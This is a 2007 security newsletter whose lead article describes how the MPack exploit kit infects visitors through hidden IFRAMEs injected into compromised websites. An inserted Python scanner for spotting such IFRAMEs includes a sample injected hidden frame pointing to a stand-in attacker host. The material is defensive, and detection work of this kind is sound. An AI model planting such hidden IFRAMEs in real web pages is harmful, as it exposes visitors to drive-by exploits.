
Wednesday, June 27, 2007

MPack Runs Rampant

PLEASE VISIT OUR SPONSORS, WHO BRING YOU SECURITY UPDATE FOR FREE:

Risky Business: Managing Risk Through Security

http://list.windowsitpro.com/t?ctl=5BC1B:4160B336D0B60CB1E7712365DBE4E093

Keep Unsecured Machines Off Your Network

http://list.windowsitpro.com/t?ctl=5BC1D:4160B336D0B60CB1E7712365DBE4E093

Automated GLBA Security Compliance: Free Report

http://list.windowsitpro.com/t?ctl=5BC2B:4160B336D0B60CB1E7712365DBE4E093


=== CONTENTS ===================================================

IN FOCUS: MPack Runs Rampant

NEWS AND FEATURES
- Latest ZLOB Plays on People's Desire for Online Video
- HP to Provide Web Application Security
- PatchLink Moves to Unify Protection and Control
- Recent Security Vulnerabilities

GIVE AND TAKE
- Security Matters Blog: Hack the Beta--Win a Game Box
- FAQ: Preparing AD for Exchange 2007
- From the Forum: Preventing Power Users from Creating Shares
- Share Your Security Tips

PRODUCTS
- Continuous Authentication and Encryption
- Wanted: Your Reviews of Products

RESOURCES AND EVENTS

FEATURED WHITE PAPER

ANNOUNCEMENTS


=== SPONSOR: Neverfail =========================================

Risky Business: Managing Risk Through Security
Every business faces risk. Have you properly assessed your company's
risk and put a focus on business continuity? Attend this free Web
seminar and learn how you can ensure seamless recovery of your key
systems and keep your users continuously connected. On-demand Web
seminar.

http://list.windowsitpro.com/t?ctl=5BC1B:4160B336D0B60CB1E7712365DBE4E093


=== IN FOCUS: MPack Runs Rampant =============
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

The need to secure your Web servers has never been higher. In the past,
many people worried about potential damage to their company's
reputation should their site be broken into. After all, a defacement
negatively affects not only a Web site but also a company's public
image.

But there's another, more dangerous aspect to keep in mind: Your site
might be turned into a vicious attack vector, making you responsible
for damaging any number of innocent people's computers. Anyone with a
public-facing Web site has a serious responsibility to protect its
visitors. And if you're hosting other people's Web sites, your level of
responsibility is exponentially higher.

A case in point that clearly demonstrates the need for vigilance is the
relatively new MPack tool--not to be confused with the compression
software of the same name.

MPack is an automated, intelligent, server-based attack tool that is
being used to infect untold numbers of computers. It's basically like
Metasploit, except that targets are pushed towards MPack en masse. The
tool is PHP-based and is a flexible attack platform complete with a
back-end management and monitoring interface. The server components are
used to deliver exploit payloads to browsers, and people place links to
an MPack server into Web pages all over the Internet.

The primary motive of MPack is to generate income through criminal
activity. Its creators have been selling the tool for about $700 since
at least December 2006 along with attack modules that evolve as new
attack types become possible. According to Panda Labs, new modules cost
anywhere from $50 to $150 depending on the level of exploitation a
module can carry out.

Recently, intruders using MPack established domains to host Web sites
to contain links to attack code and broke into numerous Web hosting
accounts (and quite possibly privately operated Web sites) to include
attack code in the pages of those unsuspecting, compromised Web sites.
The attack code typically consists of IFRAME tags that tell a visitor's
browser to load a malicious Web page inside an existing Web page. The
browser can be instructed to load a malicious Web page without the user
having to take any action other than to visit the compromised Web site,
and the IFRAME can be coded to not even be noticeable on the
compromised site. So the visitor might remain completely unaware that
exploitation is taking place.

The malicious Web page contains code that, when run, can determine the
visitor's OS and browser type and then deliver corresponding exploit
code. Code exists to exploit Windows, Linux, BSD, and Mac OS systems as
well as at least seven browsers and various components, such as Apple
QuickTime, WinZip, and other common tools. MPack can also be made to
instruct a vulnerable computer to download malicious files. From there,
a huge range of possibilities opens up.

Panda Labs reports that one Web server recently inspected contains
7,644 Web pages infected with links to MPack-based exploits. Exactly
how many sites and pages have been infected remains unknown; however
one trusted source told me that at least one major hosting company
(which I won't name) found that its servers were compromised through a
combination of exploits, and as a result, a large number of index.php
files were overwritten to contain exploits based on MPack.

In that incident, I was able to take a look at several of the affected
sites because I know the operators of those sites. The intruders made a
puzzling choice to completely overwrite every file that contained the
string "index" with a simple IFRAME tag to launch exploits. Since all
the index pages for the affected sites suddenly started showing up
empty, the break-in became obvious sooner rather than later.

I have no idea why the intrusion was made so obvious. Had the intruders
inserted an IFRAME tag into existing HTML instead of overwriting pages
entirely, the intrusion could have gone undetected for a very long
time, and the number of infected computers would have risen
tremendously.
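As an added example (not code from the newsletter or from Panda Labs), a small Python scanner for the injection pattern described above: it flags IFRAME tags that are zero-size, hidden by style, or pointing off-site, and index pages that consist of nothing but an IFRAME, which is the overwrite pattern seen in the incident. The trusted host list and the two sample pages are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Style values that make a frame invisible to the visitor
_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class _IframeCollector(HTMLParser):
    """Collect every <iframe> tag's attributes and all visible text."""
    def __init__(self):
        super().__init__()
        self.iframes = []
        self.text = ""
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
    def handle_data(self, data):
        self.text += data

def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel (a hidden frame)."""
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1

def find_suspicious_iframes(html, trusted_hosts):
    """Return (src, reasons) pairs for IFRAMEs that look injected."""
    p = _IframeCollector()
    p.feed(html)
    findings = []
    for attrs in p.iframes:
        src = attrs.get("src", "")
        host = re.sub(r"^https?://", "", src, flags=re.I).split("/")[0].lower()
        reasons = []
        if host and host not in trusted_hosts:
            reasons.append("external src " + host)
        if _tiny(attrs.get("width", "x")) or _tiny(attrs.get("height", "x")):
            reasons.append("zero-size frame")
        if _HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden by style")
        if reasons:
            findings.append((src, reasons))
    # A page holding an IFRAME and no visible text matches the overwritten-index pattern
    if p.iframes and not p.text.strip():
        findings.append(("<whole file>", ["page consists only of IFRAME(s)"]))
    return findings

# Constructed samples: a legitimate page with a trusted frame, and an overwritten index page
CLEAN_PAGE = '<html><body><h1>Welcome</h1><iframe src="http://example.com/map" width="400" height="300"></iframe></body></html>'
OVERWRITTEN_INDEX = '<iframe src="http://attacker.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>'

def scan_samples(trusted=frozenset({"example.com"})):
    return {"clean": find_suspicious_iframes(CLEAN_PAGE, trusted),
            "overwritten": find_suspicious_iframes(OVERWRITTEN_INDEX, trusted)}
```

Run `find_suspicious_iframes` over each HTML file under a Web root and review anything it returns; a hit on every file named index* at once is the signature of the mass overwrite described above.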

If you're interested in more details about MPack, Panda Labs published
a detailed analysis of the MPack attack platform, available at the URL
below in PDF format.

http://list.windowsitpro.com/t?ctl=5BC20:4160B336D0B60CB1E7712365DBE4E093


=== SPONSOR: St. Bernard Software ==============================

Keep Unsecured Machines Off Your Network
Tune into the hottest up-to-date network security protection through
this exclusive podcast featuring Windows IT Pro editor Karen Forster
and Microsoft's Ian Hameroff. Learn how Network Access Control (NAC)
and Network Access Protection (NAP) work and what technologies are
involved, as well as what third-party products are poised to work with
these technologies.

http://list.windowsitpro.com/t?ctl=5BC1D:4160B336D0B60CB1E7712365DBE4E093


=== SECURITY NEWS AND FEATURES =================================

Latest ZLOB Plays on People's Desire for Online Video
While ZLOB has been tracked in more than 1,000 renditions since late
2005, several security firms reported that the latest ZLOB outbreak
takes social engineering to a new extreme to lure people into its trap.

http://list.windowsitpro.com/t?ctl=5BC28:4160B336D0B60CB1E7712365DBE4E093

HP to Provide Web Application Security
HP will acquire SPI Dynamics, maker and provider of Web application
security assessment software and services.

http://list.windowsitpro.com/t?ctl=5BC27:4160B336D0B60CB1E7712365DBE4E093

PatchLink Moves to Unify Protection and Control
PatchLink will acquire SecureWave, thereby taking another step
towards unified protection and control.

http://list.windowsitpro.com/t?ctl=5BC29:4160B336D0B60CB1E7712365DBE4E093

Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
discoveries at

http://list.windowsitpro.com/t?ctl=5BC22:4160B336D0B60CB1E7712365DBE4E093


=== SPONSOR: Qualys ============================================

Automated GLBA Security Compliance: Free Report
Compliance and knowledge of every aspect of the GLBA is mandatory.
Through web services, on demand security is automated and immediate
compliance to the GLBA safeguard guidelines is achieved. Learn how
comprehensive GLBA compliance is managed through internal and external
audits.

http://list.windowsitpro.com/t?ctl=5BC2B:4160B336D0B60CB1E7712365DBE4E093


=== GIVE AND TAKE ==============================================

SECURITY MATTERS BLOG: Hack the Beta--Win a Game Box
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=5BC2F:4160B336D0B60CB1E7712365DBE4E093

Here's an opportunity to put a beta security product through the
wringer and possibly win one of several game boxes in the process.

http://list.windowsitpro.com/t?ctl=5BC1E:4160B336D0B60CB1E7712365DBE4E093

FAQ: Preparing AD for Exchange 2007
by John Savill, http://list.windowsitpro.com/t?ctl=5BC2D:4160B336D0B60CB1E7712365DBE4E093


Q: How do I manually prepare my AD forest and domain for Exchange
Server 2007?

Find the answer at

http://list.windowsitpro.com/t?ctl=5BC2A:4160B336D0B60CB1E7712365DBE4E093

FROM THE FORUM: Preventing Power Users from Creating Shares
A forum participant wants to disallow power users from creating or
modifying shares. He's looked through Group Policy Objects (GPOs) and
can't find a way to remove the Shares snap-in under Computer Management
or just lock it out. If prevention isn't possible, is there a way to
turn on auditing for share creation? To join the discussion, go to

http://list.windowsitpro.com/t?ctl=5BC1A:4160B336D0B60CB1E7712365DBE4E093

SHARE YOUR SECURITY TIPS AND GET $100
Share your security-related tips, comments, or problems and
solutions in Security Pro VIP's Reader to Reader column. Email your
contributions to r2r@securityprovip.com. If we print your submission,
you'll get $100. We edit submissions for style, grammar, and length.


=== PRODUCTS ===================================================
by Renee Munshi, products@windowsitpro.com

Continuous Authentication and Encryption
2factor announced Real Privacy Management (RPM), a two-factor
private-key software solution that can be deployed standalone or inside
a software application, device, or chip. RPM continuously generates new
256-bit secret keys that are used to mutually authenticate each party
and to encrypt/decrypt every data transmission in real time. 2factor
also announced SecureWeb, a small auto-loading applet that invokes a
secure instance of the user's default browser. SecureWeb runs RPM to
authenticate and encrypt sensitive transactions. For more information,
go to

http://list.windowsitpro.com/t?ctl=5BC33:4160B336D0B60CB1E7712365DBE4E093

WANTED: your reviews of products you've tested and used in
production. Send your experiences and ratings of products to
whatshot@windowsitpro.com and get a Best Buy gift certificate.


=== RESOURCES AND EVENTS =======================================
For more security-related resources, visit

http://list.windowsitpro.com/t?ctl=5BC2C:4160B336D0B60CB1E7712365DBE4E093

Black Hat USA 2007, July 28-August 2 in Las Vegas, is the world's
premier technical event for ICT security experts. Choose from 30 hands-
on training courses and 90 briefings presentations with lots of new
content and new tools. Network with 4,000 delegates from 70 nations.
Visit product displays by 30 top sponsors in a relaxed setting.

http://list.windowsitpro.com/t?ctl=5BC32:4160B336D0B60CB1E7712365DBE4E093

Improve the security of Linux and UNIX computers by letting them
authenticate and authorize users through Microsoft Active Directory.
This white paper shows how you can lower costs, improve security,
simplify user account management, and demonstrate compliance with
regulatory requirements.

http://list.windowsitpro.com/t?ctl=5BC1F:4160B336D0B60CB1E7712365DBE4E093

Gain control over the growing amount of file data in your enterprise.
Learn how file area networks can help you centralize file
consolidation, migration, replication, and failover. Download this
eBook and start streamlining your file management projects today!

http://list.windowsitpro.com/t?ctl=5BC21:4160B336D0B60CB1E7712365DBE4E093


=== FEATURED WHITE PAPER =======================================

One of the main concerns in the IT industry today is security. This
white paper, written by Microsoft MVP for Terminal Services Claudio
Rodrigues, takes a deep look at security concerns, the available
solutions, their drawbacks, and a new complementary way of addressing
today's security issues.

http://list.windowsitpro.com/t?ctl=5BC1C:4160B336D0B60CB1E7712365DBE4E093


=== ANNOUNCEMENTS ==============================================

Introducing a Unique Exchange and Outlook Resource
Exchange & Outlook Pro VIP is an online information center that
delivers new articles every week on messaging topics such as
administration, migration, security, and performance. Subscribers also
receive tips, cautionary advice, direct access to our editors, and a
host of other benefits. Order now at an exclusive charter rate and save
up to $50!

http://list.windowsitpro.com/t?ctl=5BC24:4160B336D0B60CB1E7712365DBE4E093

Special Invitation for VIP Access
Become a VIP subscriber and get continuous inside access to all the
content published in Windows IT Pro, SQL Server Magazine, Exchange &
Outlook Pro VIP, Scripting Pro VIP, and Security Pro VIP. Subscribe
now!

http://list.windowsitpro.com/t?ctl=5BC23:4160B336D0B60CB1E7712365DBE4E093


================================================================

Security UPDATE is brought to you by the Windows IT Pro Web site's
Security page (first URL below) and Security Pro VIP (second URL
below).

http://list.windowsitpro.com/t?ctl=5BC2E:4160B336D0B60CB1E7712365DBE4E093

http://list.windowsitpro.com/t?ctl=5BC31:4160B336D0B60CB1E7712365DBE4E093

Subscribe to Security UPDATE at

http://list.windowsitpro.com/t?ctl=5BC26:4160B336D0B60CB1E7712365DBE4E093

Unsubscribe by clicking

http://list.windowsitpro.com/u?id=4160B336D0B60CB1E7712365DBE4E093

Be sure to add Security_UPDATE@list.windowsitpro.com
to your antispam software's list of allowed senders.

To contact us:
About Security UPDATE content -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=5BC30:4160B336D0B60CB1E7712365DBE4E093

About your product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

View the Windows IT Pro privacy policy at

http://list.windowsitpro.com/t?ctl=5BC25:4160B336D0B60CB1E7712365DBE4E093

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2007, Penton Media, Inc. All rights reserved.
